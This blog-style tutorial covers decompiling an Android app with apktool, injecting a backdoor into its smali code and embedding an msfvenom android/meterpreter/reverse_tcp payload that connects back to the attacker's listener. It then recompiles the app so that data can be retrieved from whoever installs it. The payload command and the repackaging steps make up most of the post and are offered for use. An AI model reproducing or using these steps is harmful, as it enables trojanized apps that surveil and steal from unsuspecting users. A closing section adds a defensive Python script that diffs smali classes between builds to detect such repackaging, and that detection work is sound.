Retrieve data using an Android App 📲📲👻👻
In this blog I'm going to explain how to decompile an Android app using msfconsole and msfvenom. To complete this task you should have a basic knowledge of Kali. I'm going to use msfvenom to set payloads and set up a listener in the Metasploit Framework. You also need a little knowledge of reverse engineering to complete the following task. The tools listed below are used to complete it.
- VMware or Virtual Box
- Kali Linux
- Android Emulator
First you have to download the .apk file, which is the Android app we are going to decompile.
Then open a Kali terminal and let's see how to decompile it using apktool.
Open the terminal and type
# apktool -h
As you can see in the terminal, to decompile your app type
# apktool d -o folder app.apk
Here the -o option saves the decompiled output into the folder called folder.
apktool will then decompile your app to smali files. For many Android apps it is very easy to decompile the app.
Furthermore, you can decompile your .apk file to a jar file using dex2jar.
After you decompile the apk to smali, you can edit the smali files or add a backdoor or anything else to them. But if an error occurs after you change the smali, it may not recompile to an .apk again. So make sure you inject in the proper place and in the proper way.
After injecting, we have to set the payload. For that, first check your IP using the command #ifconfig and find a port which is not in use. Here I chose 444.
#msfvenom -p android/meterpreter/reverse_tcp set LHOST= 192.168.##.## LPORT=### -o <output-file-name>
Then your payload will be saved to the output folder.
Go to the folder where your payload is stored, copy the folder metasploit, and paste it inside the com folder of the original app. Now try to recompile by running the following command inside the folder which contains the decompiled smali files.
#apktool b
After completing the above basic steps, try to retrieve information through your Android app using the backdoor.
This blog will only give you a basic idea about how to decompile an Android app and how to set a payload.
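A defender can spot the repackaging described above by decoding a known-good copy and a suspect copy of the same app with apktool and diffing their smali class sets. The script below is an added example, not code from the original post; the directory layout, the sample class names and the `audit` helper are assumptions made for illustration.

```python
import os
import tempfile

# Package directory the post says is copied into the app's com/ folder.
SUSPECT_PREFIXES = ("com/metasploit/",)

def smali_classes(decoded_dir):
    """Class files in an apktool output tree, relative to each smali*/ root."""
    classes = set()
    for entry in os.listdir(decoded_dir):
        root = os.path.join(decoded_dir, entry)
        # apktool writes one root per dex file: smali/, smali_classes2/, ...
        if not (entry.startswith("smali") and os.path.isdir(root)):
            continue
        for cur, _dirs, files in os.walk(root):
            for name in files:
                if name.endswith(".smali"):
                    rel = os.path.relpath(os.path.join(cur, name), root)
                    classes.add(rel.replace(os.sep, "/"))
    return classes

def audit(reference_dir, candidate_dir):
    """Diff a candidate decode against a known-good decode of the same app."""
    added = sorted(smali_classes(candidate_dir) - smali_classes(reference_dir))
    flagged = [c for c in added if c.startswith(SUSPECT_PREFIXES)]
    return {"added": added, "flagged": flagged}

def _write_tree(base, paths):
    # Helper for the demo only: creates placeholder .smali files.
    for p in paths:
        full = os.path.join(base, *p.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("# constructed placeholder\n")

def demo():
    """Audit two constructed trees (file names are made up for the example)."""
    with tempfile.TemporaryDirectory() as tmp:
        good, bad = os.path.join(tmp, "good"), os.path.join(tmp, "bad")
        original = ["smali/com/example/app/MainActivity.smali"]
        _write_tree(good, original)
        _write_tree(bad, original + ["smali/com/metasploit/stage/Sample.smali",
                                     "smali_classes2/com/example/app/Extra.smali"])
        return audit(good, bad)

if __name__ == "__main__":
    print(demo())
```

Any entry in `added` means the suspect build contains classes the reference build does not, which is worth investigating even when nothing matches `SUSPECT_PREFIXES`, since a package directory can be renamed.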